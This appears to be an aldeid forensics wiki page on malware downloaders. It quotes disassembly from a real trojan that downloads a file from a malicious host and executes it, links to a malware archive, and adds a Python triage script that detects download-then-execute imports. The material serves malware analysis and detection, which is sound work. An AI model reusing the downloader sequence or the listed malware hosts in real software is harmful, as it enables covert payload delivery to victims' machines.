Category:Digital-Forensics/Downloaders

From aldeid

Downloaders

Description

  • Some malware downloads additional resources from the Internet, or is only a downloader that retrieves the real malware once it is installed and activated on the target machine.
  • This keeps the initial binary small and more likely to fly under the radar.
  • The protocols used to download the files are commonly HTTP, HTTPS or FTP, but other protocols, even custom ones, could also be used.

Steps

The following assembly code is an extract from TrojanDownloader:Win32/MultiDL.3_0, available for download here: http://vx.org.ua/dl/vir/Trojan-Downloader.Win32.MultiDL.30.b.zip

Step: Download file and save to disk
Functions:
  • URLDownloadToFile()
Example:
.text:0040118D                 public start
.text:0040118D start           proc near               ; CODE XREF: .text:004010AC↑j
.text:0040118D                 push    0               ; LPBINDSTATUSCALLBACK
.text:0040118F                 push    0               ; DWORD
.text:00401191                 push    offset CmdLine  ; "system32.ini"
.text:00401196                 push    offset aHttpQrojectonl ; "Http://qrojectonline.ath.cx/yourserver."...
.text:0040119B                 push    0               ; LPUNKNOWN
.text:0040119D                 call    URLDownloadToFileA
.text:004011A2                 push    0               ; LPBINDSTATUSCALLBACK
.text:004011A4                 push    0               ; DWORD
.text:004011A6                 push    offset aHttpWwp_icq_co ; "Http://wwp.icq.com/scripts/WWPMsg.dll?f"...
.text:004011AB                 push    offset aHttpWwp_icq_co ; "Http://wwp.icq.com/scripts/WWPMsg.dll?f"...
.text:004011B0                 push    0               ; LPUNKNOWN
.text:004011B2                 call    URLDownloadToFileA

Step: Execute newly downloaded file
Functions:
  • ShellExecute()
  • WinExec()
  • ...
Example:
.text:004011B7                 push    0               ; uCmdShow
.text:004011B9                 push    offset CmdLine  ; "system32.ini"
.text:004011BE                 call    WinExec
.text:004011C3                 push    0
.text:004011C5                 call    $+5
.text:004011CA                 jmp     ExitProcess
.text:004011CA start           endp
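The two steps above (a download API followed by an execute API, with a URL and a local file name in the string table) are the static signature an analyst looks for when triaging a suspected downloader. The following script is an added example, not code from aldeid or from the sample: it pulls printable strings out of a binary the way `strings` does and reports whether the download-then-execute pair is present. The sample bytes and the example.invalid URL are constructed for the demonstration.

```python
import re
from typing import Dict, List

# Win32 imports that fetch a resource over the network and write it to disk.
DOWNLOAD_APIS = {
    "URLDownloadToFileA", "URLDownloadToFileW", "InternetOpenUrlA",
    "InternetOpenUrlW", "InternetReadFile", "HttpOpenRequestA",
    "HttpOpenRequestW", "FtpGetFileA", "FtpGetFileW", "WinHttpOpenRequest",
}
# Win32 imports that launch a file once it is on disk.
EXEC_APIS = {
    "WinExec", "ShellExecuteA", "ShellExecuteW", "ShellExecuteExA",
    "ShellExecuteExW", "CreateProcessA", "CreateProcessW",
}

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")          # runs of 4+ printable bytes
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"'<>]+")  # case-insensitive scheme


def extract_strings(data: bytes) -> List[str]:
    """Return printable ASCII runs of at least four bytes, like the `strings` tool."""
    return [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]


def triage(data: bytes) -> Dict[str, object]:
    """Flag the download-then-execute pattern from a binary's string table."""
    strings = extract_strings(data)
    names = set(strings)
    found_dl = sorted(names & DOWNLOAD_APIS)
    found_ex = sorted(names & EXEC_APIS)
    urls = sorted({u for s in strings for u in URL_RE.findall(s)})
    if found_dl and found_ex:
        verdict = "downloader-candidate"   # both halves of the pattern present
    elif found_dl:
        verdict = "network-capable"        # fetches, but no obvious launcher
    else:
        verdict = "no-indicator"
    return {"download_apis": found_dl, "exec_apis": found_ex,
            "urls": urls, "verdict": verdict}


# Constructed stand-in for a PE image: a few import-name strings plus a URL
# and the local file name the payload would be saved under (not a real sample).
SAMPLE = (b"MZ\x90\x00" + b"\x00" * 16
          + b"KERNEL32.dll\x00WinExec\x00ExitProcess\x00"
          + b"urlmon.dll\x00URLDownloadToFileA\x00" + b"\x00" * 8
          + b"Http://example.invalid/yourserver.exe\x00system32.ini\x00")

if __name__ == "__main__":
    print(triage(SAMPLE))
```

This only catches imports and URLs that sit in the clear; a downloader that resolves its APIs with GetProcAddress or decrypts its URL at runtime will score "no-indicator" and needs dynamic analysis instead.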

Launchers / Loaders

Description

A launcher or a loader is a program that installs malware for immediate or future covert execution. Launchers often contain the malware that they are designed to load.

